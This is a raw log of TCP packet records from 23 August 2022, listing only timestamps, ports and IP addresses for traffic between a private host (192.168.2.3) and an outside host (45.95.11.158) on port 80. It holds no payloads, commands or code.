Aug 23, 2022 03:42:55.948059082 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.948097944 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.948118925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.948137999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.948152065 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.948179007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.948215008 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.948219061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.948225021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.948251009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.948272943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.948307991 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.977828026 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.977930069 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.977932930 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.977989912 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.977998018 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.978060961 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.978069067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.978128910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.978172064 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.978264093 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.978308916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.978359938 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.978488922 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.978532076 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.978552103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.978626013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.978662014 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.978667974 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.978674889 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.978720903 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.978724957 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.978779078 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.978795052 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.978853941 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.982649088 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.982697010 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.982748032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.982783079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.984209061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.984255075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.984292030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.984296083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.984308004 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.984338999 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.984340906 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.984380007 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.984386921 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.984437943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.984498024 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.984539032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.984546900 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.984646082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.984647036 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.984698057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.984968901 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985028028 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985136986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985202074 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985224962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985243082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985245943 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985284090 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985290051 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985321045 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985333920 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985361099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985371113 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985400915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985405922 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985440969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985469103 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985483885 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985485077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985522032 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985526085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985560894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985568047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985599995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985605955 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985637903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985642910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985677004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985682011 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985719919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985748053 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985789061 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985796928 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985826015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985833883 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985871077 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985893965 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.985940933 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.985985994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.986027956 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.986038923 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.986069918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.986074924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.986108065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:55.986116886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:55.986152887 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.009790897 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.009896040 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.009901047 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.009974003 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010010004 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010026932 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010044098 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010052919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010094881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010106087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010138988 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010140896 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010174990 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010207891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010234118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010235071 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010238886 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010243893 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010246992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010267973 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010299921 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010329962 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010333061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010332108 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010356903 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.010380030 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010389090 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.010406971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.016638041 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016678095 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016711950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016746998 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016772032 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.016781092 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016783953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.016787052 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.016813993 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016815901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.016836882 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.016848087 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016870022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.016880989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016916037 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016918898 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.016952038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016957998 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.016984940 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.016993046 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017019033 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017019987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017055035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017067909 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017090082 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017106056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017126083 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017149925 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017158985 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017194986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017214060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017230034 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017232895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017251968 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017285109 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017307043 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017323971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017355919 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017364979 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017379999 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017404079 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017421007 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017443895 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017487049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017493010 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017494917 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017534971 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017549038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017577887 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017596006 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017616987 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017630100 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017657995 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.017671108 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.017714024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018424988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018469095 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018495083 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018510103 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018548965 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018552065 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018554926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018591881 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018604040 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018635035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018645048 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018677950 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018718958 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018723011 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018767118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018807888 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018812895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018825054 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018830061 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018846989 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.018872976 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.018899918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.019496918 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.019552946 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.019594908 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.019635916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.019645929 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.019676924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.019717932 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.019731998 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.019737959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.019757986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.019768953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.019773960 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.019778013 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.019845963 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.041784048 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.041843891 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.041886091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.041904926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.041915894 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.041939020 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.041944027 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.041954994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.041980982 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.041997910 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.042006016 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.042041063 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.042068005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.042079926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.042104959 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.042118073 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.043534994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.043582916 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.043622971 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.043623924 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.043687105 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044063091 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044111967 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044121981 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044128895 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044152975 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044174910 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044193029 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044207096 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044235945 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044270039 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044279099 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044300079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044317961 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044344902 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044358969 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044383049 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044418097 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044656038 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044698000 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044720888 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044740915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044749975 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044781923 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044799089 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044816017 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.044840097 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.044873953 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049444914 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049499035 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049540043 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049581051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049591064 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049623013 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049628019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049633026 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049637079 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049664021 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049679995 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049695015 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049731970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049736977 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049772024 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049777031 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049782038 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049818039 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049848080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049856901 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049886942 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049887896 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049900055 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049928904 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049932003 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.049971104 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.049974918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050000906 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050014019 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050044060 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050049067 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050084114 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050095081 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050129890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050129890 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050179005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050190926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050218105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050228119 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050260067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050277948 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050301075 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050307035 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050328016 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050343990 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050369978 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050379992 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050410986 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050414085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050451994 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050471067 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050482988 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050508022 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050522089 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050534010 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050564051 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050569057 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050604105 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050612926 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050633907 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050649881 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050674915 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:42:56.050678968 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:42:56.050714970 CEST	80	49774	45.95.11.158	192.168.2.3
